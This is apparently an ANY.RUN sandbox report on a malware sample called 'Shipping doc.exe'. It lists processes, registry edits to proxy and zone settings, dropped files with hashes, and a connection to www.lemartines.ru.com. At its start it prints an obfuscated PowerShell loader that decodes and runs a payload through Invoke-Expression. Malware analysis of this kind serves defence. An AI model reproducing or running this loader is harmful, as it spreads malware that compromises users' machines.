AAFuEAcBCaCSnCPeDGaBDiCSw2UhCDe2AlCRe7 hDunABuCTi7BaCCl1ReCBr0CrDUdDIn9Ho9Be8Om7 A' E;Sm&Ta(fe`$CaRSue Tt HtSieHas PkPae MmSua PeMorKrn Ve NsGa2pr3Dh3 S7Kl)Sk L`$trD AuPeeLanTanEla OdunoOlm B4Pr;lo`$InDMiuMeeUfn Nn AaAudUnoFlmDa5At T=co DoVFjA LRSm5Re3Pn Sl' IDEdCEkCSuBUpDBaABeDFoBCyDFoCToCco0mo8ArESk8ReAwhETr8ToCSk7CeCud0KlCDyF SCDu0stD MDKaCUn3PlCAb7AaCIn0 MC S7UnDBrD KDMaASmCReBBoDGuCKoCJa7IlCSlBEuDSmCSeCLa0AiC SBbaDKnDBo8Ho0 KEBrDPoDOmCUnCUnBPeCRiFHaDWiASgCSiBMaFJeA MDKa7BrDCoEmaCDrBId8So6 E8Tr7Si'Fa;Ly&Si(In`$TrRAke DtPetCaeUds CkCoe UmPoa WeSur BnSceStsNo2Kl3 M3Ov7Re)Im no`$AaDBruDoealnBynSkaFld KoOrmKr5Kl li fo To; D}Un`$FeTPisSh Dr=Ta AfVInAStRsu5Tr3gu T'UnCPi5CoCKaBBjD aC ACti0ArCEmBsbC I2Hy9HoDNo9ShCDy'Gh; A`$ CU FnInacapfopThoSaiAnn MtDoaexbHulCiePh Ek=Ga AsV DATrRGo5Be3By St'alDadBRuDRaD OCMiBloD AC g9SeDFy9UhCSt're;Em`$ PHKlaBeeAtm RapltIriEndOp0Pu3Ga De=un ShVTrANaRSt5Ta3Ca Wa'SmEBl9FaC BB SDDeA IEIdDTaCCo1PoCfi0CiDTeD DCMo1TrCst2MeCSoBSwF B9skCna7 PCCo0 OCOpA MCul1CoDUn9Ga' I;Tr`$DiHTraReeScm Ha Bt Mi IdDi0Ar0Im=PsVAgAPiRca5an3Fo Vi'SeFInDMeCBj6 KC S1AbDNo9DoFMo9MuCDo7 JC T0SpC FAShCVi1ChDVi9ti'Tr; U`$SiDWiuLfe UnasnAcaRedUooDemBa6Fr Sa=Un RV BAFoRde5Pr3 b Ar' F8 SAOrFReEneDSaCGoC L7UnCAtDGeC B5HuCTe7SyCCr0SaCUg9DaCFo2BrDAn7To9IsCRi9OvFSu8VeE K9St3Sv8 IEUnFIn5AaFRoDPrDHu7PoDZoDAnDMiABoCBlBBlCQu3Ln8Sn0GoFMoCPrD dBLaCDe0EkDMaAWaCFu7PrC S3ReCSoB I8Va0 SEva7FoCPa0InDWeA XC FB ED FCreCPr1 BDkoE SF OD aCKoBArDPaCMoDma8EnCIn7 SCKeDKaCMuBRiDSkDOb8In0TrEAf3HaC nFArDLoCOuDjvDApC v6ReCVeFNeCPa2 BF A3Hu9 D4Et9 S4InEVi9OvCAnBStD BAjuEArABdC EBInCPi2 PCAbBStCEf9RiCCoFTiDimAMyCCoBMuEDe8 JCOp1SyDLiCOvE A8InDFrBFoCPa0UdCDuD PDMaASeCDe7FoCLa1UrCAa0FrFSkEKvCSk1 SC N7PrC D0IaDcoA ACEnBThDJvCSd8St6Ph8He6AkCFj8 ACTr5NaDDiEDe8MiEFa8PoAReF AABeD SDRh8 IEFo8PrASeF SCVoCNoBSeD SAopDRaA GCEpBBeDAnD rCPh5FoC RB PCAa3 OC SFUnCSuBinDhaC DCGu0MeC OBKnDAlDma9joC S9euDWu9EnD T9FoARu8 w7Gl8Ko2Un8ElE R8 U6ReEFr9 TETeA SFKaACy8UnEOvEToEHu8Ka6TiFSp5apEpe7LaCUn0AeDHeAceFspEPlDAcA ODAsCLtFBr3Oo8Ad2De8 PEDiFMa5 LFDiBSlEGa7KoCJa0NaDArAFo9BaDLe9CaCLeF E3 T8 B2Te8ruEAzFba5AfFDaBTeEpy7DeCFo0TiDPrAHo9OoDAb9FrC SFTr3An8Gl2Re8StEpsFNa5HyFPyBAcEFr7StCIn0BaDprA N9FlDGe9DrCMoF S3Bu8fa7Ef8 MEKe8 R6PrFUn5InE A7PiC s0 EDAnANeF LEUeDlyAUnDBlCUgFVo3 D8Pr7He8co7Ki8bl7Ov'Kr;Sy& I(Ka`$PeRReeBatVitInePesInk ReInmteagee Grkon IeWisPl2li3ni3 F7 N)Br S`$SeDSuuSaeConWhnAlaVadHyoGamUs6 F;Le`$ BHIna GeMamBeaKotReiCedTr0 O1 A de=Ba SVhuAFlR A5La3St It'Ma8LgABeF PDUiCDo2reCUl1ReDLuAPlDSyAReC SBdeDIaAAk8InE P9vi3 T8HeEAfF J5FlFSuD sDSp7DeDDeDNoD MAShC SBDeCPi3St8Fo0TeF SCFoDSnB sCFu0PrDFoAeqCAn7FoCSn3 ACspBAf8Ca0keEpe7 SCNo0naDTiASeCReBreDSiCReCfo1FoD TE LFtoD PCTaBSnDSuC HDPe8YaCIn7 KCOpDPsC CB sDTaDUn8Sa0 CEko3HjCUnFZoDViCBrDEkD GCOv6VeCRkFKvCsa2SkFIn3To9Hy4Ho9Sc4SyE R9 TC TBCaDUbA OERuAOpCSiBLsCol2AfCAnB CCsh9ChCMeFLeDFoAAnCAcB BE s8coCGe1PeDNeCEnE D8 SD PBStCAl0SpCMeDGrDElA CCHo7TiCLo1 PC A0MoFHyEKoCNy1 MCte7 SC U0PrDUnA MC LBskDKaCEi8 N6Se8dr6SvC c8TrCPu5 KDReE A8GjENy8 BAOrF SBImCAi0KlCChFupDJeESvD TEAsCMo1 DCBr7HaCSk0HoD BANoCBaFOpCKaCDeC N2riCPrBRi8lnESk8AsATiESp6SlCIrFTrCFoBHaCFo3SaCReFCaDSaA YCBi7 TCsuA F9DrEHj9 PE i8Je7Wa8Ma2Su8aaEAv8 A6DaEva9AfESlAFoFFoA U8AfEViESuEUk8Mi6 bFAk5EmEOr7 RCun0BrDSiABeFSoEUnDUrAKrDDrCcoFSp3Om8Ca2Ba8FuEWiF V5MaFFeBopEPl7SuCGe0ImDBeAPa9adDno9LeCOpF B3Sl8Ar7 T8 FELa8 A6SoFAr5FuEDi7 uCBu0PrDHeA IFAnESeDGrAFoDOvC SFwa3Ak8de7Mo8 S7 S8Mu7St'ho;St&Ob(Af`$PlR TeSttUltFieUnsLskAteOmmLaaineGarStnCoeCasGl2 R3Va3Ap7Re)Fo Ur`$UnHShaGreInmUnaaftYviHydku0Se1 M;Sk`$ PH La NePrmseaVktUniCodSa0Po2 D M=Be DVAsANoRWo5St3sl Aa'Ke8 MATeEBl8AtC S7KoC U0FoCAfFaiCJa0TrDFaD ACFy2BoCHa1 CDJu8KoDEcDNoC D8 TC R1InDEkCStCRe2 BCbl7GsCUn9EkCUnBQuDAnARe8 PE N9Im3Ba8UnEBuFKe5BuF ODFjDUd7FeDKoDMoDChAPaCPaB FCTe3 A8An0 AFstCPaD PBTiCDr0TiD SANiCVa7AlCIm3TiCPrB D8Mo0ReEdi7StCSe0koDIdAFoC SBDeDClCVoCKa1 ADKlE MFBoDApCDeBTeDAbCVsDPr8StC S7NoCbvDMeCDaBRoDEfD O8Pa0KaE T3TeCGyF ADSkCBrDFoDMiCOb6TiCHuFbaCFo2UnFSa3Ak9Fd4 B9Ud4PuEkl9KoCbiBGuDWhAOmEScANaCTeBFrCCo2StCRvB RCTu9ArCWrF BDUnASeCTuBLiEMo8BrCTr1UnDunCBeECe8 TDDeB CCSu0KnCSyD EDBuATaCGa7ErCWo1brC S0deFTeEFaCCo1InCKr7 VCUd0 SD HAUnCNoB TDdhCKo8 g6Te8ge6 SCAf8 aCef5BoD AEBe8HaE F8 TASoF CA ED EDLa8 DEVi8 EAakETr6BeC AFamC PBNaCGy3 HCOdF HD LAStC k7BrCUnAMu9EpE A9PeDBa8De7 O8 U2Re8SeEPs8 E6 DEDe9LiEMaAblFQuA D8 FEAuE SEFl8Un6 CFud5grE B7frCIn0trDBuA PF SEDoDTaACaDuuCSpFbe3Sy8 U7Hj8FeE T8Sk6 PFPe5reESc7 NCUd0OrDBrACaFtvEArD gAUdDabC PFHa3Ba8br7Ac8En7Tu8Fa7Do' E;Fo&Tr(Fo`$KrRFueOptBrtuteRhsSnkDee mmCra VeMerfanPueDos S2 H3 S3 L7Me)St p`$SuHfoaSceHem DaNotLiiTed T0 B2 U;Lg`$PrDMauAdeUnnNenNoaBldOroErmGi7 F Ar=Dr PsVSpA HRKl5di3Fo lu'Ar8AwASpETh1 RDSrCNeDEpABeCOp6StCbe1 cCUdDRoCFlB sCIn0 BDKlACiDToCMeCreBHe8 dEKa9Af3vl8BlEbn8 RA SEOm8viCca7 UCEu0UrCacFMeCEx0TjDAnD sCPi2 uCTm1CyDUn8SeDFiDDrCBl8ViC E1ReDPlCAuCdo2GeCSu7QuCGl9BrCCaBSaDBeAGo8Lu0PrETa7DaCSa0 GDlo8 OCVi1agCSy5CoCFlBIs8Fl6Pa9GrEAl8Be7Th'Se;Fi& M(Ck`$OeRLdekatFetGeeUnsAfkGoeTrmFoaAveFarSknToeSasHy2In3 F3 L7sp)Pr Mi`$ BDTiuNeeHenPan LaZedSaoOumAu7 O;Ti`$WeDwouFoeTenumnLoa Sd CoStmPu7sk Sk=Ud VeVGrACaRKu5Pa3 L C'Sw8 SAGeFStDBrCBo2 TCsu1CoD RANoDKoAChCMiBDuD DA U8Ub0VkESa7PrCSv0StDha8KdCSk1StCne5OpCPaBar8Oo6Pl8DoA KEEn1KlD RCMaDToANeC S6UpC D1AnCOxDAlC BBKnCCe0FeDAmAPrDImCSuCTrBAd8Tr2Ti8AsEpr9baESt8Te7Ud' K;Ra&ba(Si`$ SRSee OtKrtOse CsSpkFieTemPaaSheDerRen TeUnsCo2Ph3 H3Ca7Fi)Sk Ra`$LiD muEneplnStnReaGldNoocomPo7Ru;Sk`$HoEJal NaFyiArc M1pa3Fl4Ku A= H StfPjkMep T H`$ HRBeeUntOvtNoestsTikOveDimSnaSweCorDenDie PsCy2Fo3 R3 U5St me`$KeRSheHut cttae Cs AkBae SmSkaAkeShrBunNgeStsBa2Hu3 S3In6 V;Wi`$UnDBeuFreEgn NnCeaPadunoUnm A7In Ph=ru ScVFeACuR O5Ud3Ba Be'Su8HoA aFreBMeCBe0DiCBuA MCMaBFrDStCRaCElDBoDSpBFoDRuC SDDe8 UCAnBLiC nAPt9EnDFr8TiETo9Be3 A8evEVa8AfADoFBaELiDFoC SCMy7MiCSkDVeCCh5AgCSo7BeCFu0ViCRa9KeCRe2TiDSe7Pr9 OCJi9srFsu8Su0beEst7 SC P0SeDCo8PoC D1FoCGr5 HC GBMe8Li6PrFCl5CaENo7 TCUn0heDhoAOpFEnEAmDPaABeDTrCLkF E3Om9Br4Re9Pr4AnFLi4OuC WBHoD HCRiC D1 c8Di2ch8RuERo9Aa8Ap9doCTr9Me9Gr8Ul2 U8ReESu9 KETiDCo6ar9AkDHe9 PESl9 CEAl9DeEko8 K2In8AfEEp9 mEEmDKo6Vi9 AARe9EfESm8Ov7 N'Ti;Ir&Ho(Fa`$SkRIne StKut CeAmsLuk DeFimPoaAne Er snSpe SsMi2Sa3Pr3Bl7Me)Ub Ri`$BoD TuSce AnInnIna TdStoSymIn7Au;Re`$ HDDau Pe InTun DaLod AoFomPr8Sp Wo=At MVLiA ORjo5Te3 U Ue'Pr8ByAYaECi0 LCGa1HaCCa0SaDUnD TDFlEFrCPlBAfC BDPuDCoBKoC P2ElC FFSkDSoAScCTa7PhDMe8UnCHeBHe8ChEIn9Sv3La8LeEJv8 AALuFMaEBlDPaCSnCBo7 SC FDJeCSp5NeCGr7 RCAn0ToCal9PrCtl2EjDPo7Af9 MC G9 EFNo8 A0 LE G7DiCEl0leDEn8DiCVa1 TCUn5OpCFoBSy8 B6beFLu5ExEAp7 mCMe0InD tA AF WEStDBoASiDVaCraFDo3Ma9 T4ku9sk4FrFOp4reCViBCaD NCRiC E1Un8Gh2 F8 TE b9 RFEf9No9Sh9PiFVa9KnESm9Me6 F9Ho7Pa9Id7 S9feCSm8Ro2Pl8unESi9OpE ODUn6Af9IsDSv9EsEGr9flETa9PaE C8Tr2Ud8BrETe9GrEDeDPo6Un9AcAdy8Br7Ap'Co;Ch& M(Kr`$brRVoeTrtLitDoeBesUdkRheSpmHeaSleTor FnEdeNosNa2Be3In3in7Ch)St C`$InD UufoeYonTanSiafrd NoFomUn8ge;Su`$PeUOvnTodKoeBerMecLeuSur RvVae Td S2Ga=He`"""Lu`$ GeDen nvCh:ZeT BEGeMAcPBl\ IuAdnTrdEneInrDdcBeataptiiCatTraRel KiThzDeeGa\ VSIneOlt LtFoeBirTanSmeLisBr.RaBRea Sg C`"""Ka;Mi`$CrD OuSaeEtnBin sa Sd WoNomOp9Su Cl= S DeVAlAPaRPa5Ec3Ph Ta'Ra8RaANoE AA CDtrBDuCBeBPrCst0TrCpu0 DC UFsaCSkASaCSk1CoCTa3Ku8DyEJu9Qu3Kv8deE uF A5DeFUnDUnDIm7clDSyD ADLaAMaC FBExCin3Pi8su0 SE p7CoESu1Be8En0SmEDa8DeC P7EkCPr2 LCFoBPaFCo3Cr9Af4 E9No4 SFPrCUtC SBSmC EFMiCInAOrEDrF LC M2KnCRe2MoEUlCViDgo7ArDHaADaCSuBSpDmhD K8Ho6Ul8GyAStF hBTuCIo0 NC SACrC BBVaD OCmuCJaDPaD ABUnDFjCFrDOv8FeC RBGoCUrATh9saC S8Pr7Un'Ba;Ce& M(sa`$SvR OePutRetSaeFlsAukSpeOmmPiaTreEur BnSoe Ts M2Sk3 C3or7Fo)St Ru`$GlD fu Fe SnNonEpaOmd NoLamSl9Un; U`$LnORebUnsMoeJir svSaaSkttar Rs NtUnadetViunosKae brsen kePr0 U So=ne AvVOpABiRSp5Al3 R Sa'SnFOd5unFStD CDAl7SkDSgDHoDBlABlCCoBBoCAb3Tr8Ov0UnFRiCThDBeB UCBr0DrDRaA IC P7SiCFe3DeCSlBPa8Re0MuEAc7 rCEj0 KDSpAEvCBeBtoDCoCStCMe1OvDTeEBaFThDFrCDyBnoD sCNaDCa8TrCRo7SyCDeDUnCHuB GD BDAr8 S0DoE B3GaCSlFUnDPuCAmD GDUnCKk6TrCFrF MC u2 BFSp3 P9ro4An9ey4DeEReDSkCSp1FoDStEPsDOv7Ri8Ge6Af8 DAHyE PABiDopB UCPiBunCBi0AfCBl0heCunFAuC TA RC E1SpCWr3Fe8Do2Dv8BrEUn9BeD F9 LEGr9OmCVe9BeARa8 A2 A8 BEEk8AaE B8LaASuF IBNuCVe0HyC CAAlCmoBAlD DCHeCUnDTuDDiBMiDHyC PDAr8ChC IBSqC KAAm9DeDsa8 o2 s8PhE S9Su8Kr9KlCin9Ti9Sy8De7Go'Ov;Sa&Ta(hy`$StRHeeIntPrtFoeBrsMekReeSkmSaa teSyr GnkoeGasEv2He3li3Ag7 D)Sa Pi`$ShOKobBasAneBurAivJuaSytBerKos ftAra EtFuu Cs PeRorJenVae S0Ru; F`$DoGDuoAnwNukMoi Ht FlCeySyswot IbSaeJar SiGaeSarTl=Pr`$StDTyuAfeYonprnBiaGadHaoTrmer. EcChoGruDvn MtMo-Ci6 B2 F7fo-Ta3To0Fi2Ci4At;hu`$SeOReb MsGieBar Rv SaactEnrFls RtTeasttSiuchs SeAnrMinSveBr1Pa Co=Ly gV BA PRDa5Gr3Th S'OfFEn5BlFTjDScD N7GrDKaDSpDRnAInCFoBPyCAr3Tr8 A0 KFNeCUsD IBimCSk0OtDCoAIrCun7geCDe3FaCjgBBl8En0AkEcr7LiCAl0StDGoA UCBaBImDDeCReCPr1 SD SEsiFFuDSuCKaBBrD KCRgD b8SaCTa7KaCApDFuCLuBPlDPrDPo8un0HeE L3MeCPiFGlD BCNeDJoDAcC M6DoCTiFFjC R2 SFAm3Im9Pe4 c9Un4KlERuDHyCTw1LaDFoE nDSp7Bi8 S6Ri8SuAPhE TACrDNoBDeC bBViCFa0TyCSh0InCErFprCDiASiCAs1 SCLi3 S8 T2co8FiEDi9Bg8Un9HaCNr9 T9Fo8Fl5Go9 sDFo9PeELe9baCEs9 UAel8 P2 R8LeEHe8 SAGlE N0 UCUn1 DCMo0CoDTeDFeDPaEBaCLiBArCTaD ED RBEpCBa2BrC EFStDEuA SCBa7 PDBi8MiCDeBSy8Ba2Go8RkEKy8 AAryETi9SaCDi1 SDPl9ElCOu5MuC C7ScD KATuCKr2EvDOv7GiDExD WDEkA BCLiCInC WBMaD TC TC s7 SCJeBSpDStCFo8Di7Fr' S;oe& s(Ad`$UnRpre BtDot ReGesTykTaethm HaOveAfr NnCieAssAr2Kn3Ho3Ch7Un)re Mu`$WiONob AsMoeHyrSmv UaNot Ir HsAftInaPitPau CsEveParVen FeBu1Re;To`$GeOAfbDysUneChrsyvAgaHetRerDusMetFlaPetEkumosTee MrUnnPoeOu2Ot St=Al FoVKaAdeR H5Sk3Gu Ku'Sk8AlAChECh2AgD LCTaCSi2 SCSi7AtCUn0 uC D9StCStBMeCHy5OpCOv1BjCHa0UdDUoAFiDAkCInC KFSpCJo5HyDHdA VC BBCrD FCex8ShEre9Id3De8EmEstFMe5 LF KDUnDPe7OvD SDZoDbiATiCCoB ICSl3Re8 O0ChFAnC EDSmBSkCAa0KeDIsAhuCFr7StCUn3KuCbaB s8Ps0TaEdi7 VCCh0HuDDiAOpC LBUnD FC FCIn1MaDMaESlFUlD ICImBLeD PCPeDgu8MiCUr7RiC UDMiC VBEyDSkDSa8 O0 IEEs3GrCSaFSpDUdCNeDLiDExC C6MoCAmFagCOu2FrFIn3Di9 E4gl9Un4CeEla9 SCteB SDNyA aEfeApoCdeB ACUn2 PCHoB GCAp9MeCSpFNeDInAAnCwaBVaEDa8 RCBo1GaD OC YECu8opD BBNaCBe0SlCDiDChDViANoC U7MaCMy1FrCbe0LiFUdEteCSy1StCst7UnCMi0fyDWeAChCSeB SDIrCSt8bi6Jd8 P6CoCSw8MyCUn5TaDSmE R8InE D8 sAReESy5ReCTr2ToCEj1ElCUnFOrCSw5AuCMe2 HC pBNoCCoAsyCFl0DiC D7 LCBr0ThCSt9En9UtC A9ToEPr8FrECh8LuAmiERe0soC FFCoDBoCAeClaFGoC M9EnDToA NCUs7beC N9 BDDiDVeDOpA LCCoBKa8Tr7mu8Bi2Eg8SkEWi8Ph6AmEBa9UpEClACrFFdAla8SaEhiEAnE T8Di6 HFMo5StENa7 TC T0FoDKrA tFPrEHiDYuA EDImCBaFNo3Op8Mo2Sh8 FEMeFAr5BrESh7MeC Y0 LDVoAilFGrEVeDkeA ODAgCNaFDr3Se8We2jo8 hETiF R5ReEAc7FaCFr0PaDPuACuFAfE CD LA ODPrCBlF R3Gr8Sq2He8EpENyFsk5SyEOp7VeCDa0CaDFoA IFMiEbeDmaAMiDpaCslFTr3Ar8 O2An8AdESpFAu5taEAz7UpCEs0ChD LA MFBuEReDCeA TDUnCchFFe3fi8Kv7Se8BeETe8br6MoFMe5PuEDd7HoCSn0syDStA FFInEInDFnAIdDStCMiFFr3An8Br7Im8Dy7cy8Ar7 P'Ef;Fo&Bi(Re`$AfRIneDot StOpeResInkGeeTomAkaAme Sr FnLie Ts A2Tr3Ca3Ha7Sk) U Ur`$UnO RbsysLaeUnrenvLeaDotHurPrsLetTraPetanuDrsBeeFerSpnfleLn2St; K`$ PONebstsVaeSarbhv UaUttPrrInsSktSoaTrtBeuLesLneNdr TnUne F3By so= S NiVGiANaRFl5 C3Af Tu'Va8SeAFoECo2SkDOuCPaC F2KnCVe7arCTo0LiC L9MiCGeBprCWi5imCHa1ChCMi0KiDTuAInDfiCDeCliFDeC E5 MDLoA UCBuBklDTeCFe8 s0KoEPo7FoCVa0SiDIn8AlCDe1 MCEc5EgCChBdu8sp6Om8ScAOrFRuBUdCTj0TrC JAUnCMoB BDUnCStCSaDSuDDeBNoDunC BDEn8hoCFuBChCJaAHj9StDEv8Pe2 G8ScASaEVe0EpCkk1SpCCo0PaDApDUnD HEViCInBEkCBaDAbDVaBAfCTi2 ICBaFMeD IAKrCCi7SkDAf8 PCVoB S8Ka2as8efAarESoBElCAf2 ACSeFFoCAl7AkCEpDAn9SkFHi9ChDFl9NaABa8Nd2 D9BaE p8Fy2 d9OvEUd8Ce7No'Fo;Di&Ad(Pa`$NeRReeGytHotMyeUdsBlk OeChm KaMeeTyr RnSme lsJu2Ge3mu3Me7Po)Se Ar`$ MOTsbSksZie nrmovEna ptBar Ps Ut IaantBlusis GeDer TnTve S3Mi#Ph;""";<#Sondrings Guitarfishes Paronymize Instinctivist Modulariseringers Durations #>;;function Observatrstatuserne8 ($Pjkkeriers,$Gowkit) { &$Tetanomotor0 (Observatrstatuserne9 'Sa$LoPSnj SkKnkbaeThrSliSheBirGesFo Na-UnbSuxfaoPurud Vr$quGExoPrw lkLeiVitNo ');};Function Observatrstatuserne9 { param([String]$Signalised); <#Dinking Restriktioner testikels Tvundnes hydrotechnologist Sieving #>; $Zuleika=2+1; For($Cordlike=2; $Cordlike -lt $Signalised.Length-1; $Cordlike+=($Zuleika)){ <#Iodobenzene Flowages Kridthusene Kasuistisk Unn Bvelserne Stripper #>; $Haematid+=$Signalised.Substring($Cordlike, 1)} $Haematid;};;$Tetanomotor0 = Observatrstatuserne9 'SkI SEDeXKv ';$Tetanomotor1= Observatrstatuserne9 $Ritraadenes;&$Tetanomotor0 $Tetanomotor1;<#Omstbning Telebarograph Unamusing Zaki Remitting Insectaria #>;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2736"C:\Users\admin\AppData\Local\Temp\Shipping doc.exe" C:\Users\admin\AppData\Local\Temp\Shipping doc.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
2
Modules
Images
c:\users\admin\appdata\local\temp\shipping doc.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2936"C:\Windows\SysWOW64\verclsid.exe"C:\Windows\SysWOW64\verclsid.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Extension CLSID Verification Host
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\syswow64\verclsid.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
Total events
2 976
Read events
2 861
Write events
109
Delete events
6

Modification events

(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\condensative\fremmedordbogen\dybdepsykologi\spidninger\Overtyped38\unlivableness\hofteholder
Operation:writeName:udlaansservice
Value:
%tlapallan%\catabolically\taabenakke\reformiverens.Bio
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\instills\taenker\nicaraguanske\ceps\Quaff\motet\modelregnskabets
Operation:writeName:efterml
Value:
943108
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\operation\Uninstall\zulukonge\Sauerkrauten74\nonbaronial\homography\aftensmads\afsejles\rumforskningen
Operation:writeName:skibshandlers
Value:
1
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\aiken\Fortuneless
Operation:writeName:Tartans
Value:
FFB1402C
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2736) Shipping doc.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(1652) wab.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(1652) wab.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
46000000C1000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
0
Suspicious files
18
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
2736Shipping doc.exeC:\Users\admin\Soldaterpapirers158.initext
MD5:3FD0A4D97E08F76F26290B7C6AE1BB82
SHA256:CD4F7B2ABAFFC2A6A3CA4C14A464846A3987979379823FB5497C6A00F152FFB4
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\undercapitalize\Pensle\Udfrelsesrkkeflger\slaaens.blobinary
MD5:623C6C5E3E42D732C882DC6C9DA4C095
SHA256:5B77C8AB579AB8506FFDFFD1AE15E42876F24A8CED9887A41A1FDFDA985A289E
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\undercapitalize\Setternes.Bagbinary
MD5:3AB6AE5383FE050F32AB6D4006AFB3E1
SHA256:84472F4B605C04F219C083CC42035F15717B3A5048332274FA8551E8A7D00138
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\undercapitalize\Cogitatively\Succesforfatternes.advbinary
MD5:6CA3CF41EBF13408B4C3B11362B89BC5
SHA256:73151920E22ECEF5B119D2DFA02C78A39A61E93AEBF0472E536466F0D32626E4
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\undercapitalize\Grandkid150\Recompensate\Rejuvenates\gasterotricha.amabinary
MD5:A97F6DCDAA07B0613671803CE5E8FE3B
SHA256:060750FEE447C67AB844D99FE01AC9E07386FC6A8F138E2B9212EC8DB6DD7D9E
996powershell.exeC:\Users\admin\AppData\Local\Temp\uw1bmnri.1nf.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\undercapitalize\Pensle\Udfrelsesrkkeflger\rathole.aspbinary
MD5:4034A7F29204A4F9364F201D66099DF4
SHA256:2A8DF4DEF88DF7D9E40F820B1AE81511B2579022FD321E0C749632A8E5816CFF
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\undercapitalize\Pensle\Udfrelsesrkkeflger\woldsman.sodbinary
MD5:18652DBEC863438F7846937A9CDA29E3
SHA256:333AC8377500082322BA45956C946C4CAB630DDE7E9C968102072B39F95FB20A
996powershell.exeC:\Users\admin\AppData\Local\Temp\2ydcxpjq.25o.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2736Shipping doc.exeC:\Users\admin\AppData\Local\Temp\nsnBE4A.tmpbinary
MD5:9A56209DE5231219D85CD7AEEFCA5359
SHA256:D4320D8F5379452B9FEB69F6920F6200085694ED17583FE3BA8CB2D6EA084D27
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
6
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1652
wab.exe
GET
200
184.24.77.206:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?70423193f7c62463
unknown
compressed
65.2 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1956
svchost.exe
239.255.255.250:1900
whitelisted
324
svchost.exe
224.0.0.252:5355
unknown
1652
wab.exe
147.50.227.33:443
www.lemartines.ru.com
CS LOXINFO Public Company Limited.
TH
unknown
1652
wab.exe
184.24.77.206:80
ctldl.windowsupdate.com
Akamai International B.V.
DE
unknown

DNS requests

Domain
IP
Reputation
www.lemartines.ru.com
  • 147.50.227.33
unknown
ctldl.windowsupdate.com
  • 184.24.77.206
  • 184.24.77.194
  • 184.24.77.202
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Shipping doc.exe